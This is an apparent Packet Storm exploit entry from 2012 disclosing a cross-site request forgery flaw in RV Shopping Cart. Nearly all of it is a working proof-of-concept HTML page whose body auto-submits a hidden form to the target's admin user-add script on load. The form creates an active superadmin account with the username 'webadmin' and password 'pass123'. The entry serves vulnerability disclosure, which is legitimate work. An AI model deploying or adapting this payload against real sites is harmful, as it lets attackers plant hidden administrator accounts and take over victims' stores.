RV Shopping Cart Cross Site Request Forgery

2012-08-29T00:00:00
ID PACKETSTORM:115983
Type packetstorm
Reporter DaOne
Modified 2012-08-29T00:00:00

Description

                                        
                                            `# Exploit Title: RV Shopping cart CSRF Vulnerability  
# Date: 26/08/2012  
# Author: DaOne (@LibyanCA)  
# Vendor: http://www.scripts4webmasters.com  
# Greetings to LCA  
  
  
# CSRF Add Admin  
  
<html>  
<body onload="document.form0.submit();">  
<form method="POST" name="form0" action="http://[target]/rvp-admin/user-add.php">  
<input type="hidden" name="user_id" value=""/>  
<input type="hidden" name="username" value="webadmin">  
<input type="hidden" name="email" value="admin@email.com">  
<input type="hidden" name="password" value="pass123">  
<input type="hidden" name="group[]" value="1"/>  
<input type="hidden" name="active" value="1"/>  
<input type="hidden" name="superadmin" value="1"/>  
<input type="hidden" name="postnote" value=""/>  
<input type="hidden" name="save_user" value="Save"/>  
</form>  
</body>  
</html>  
  
`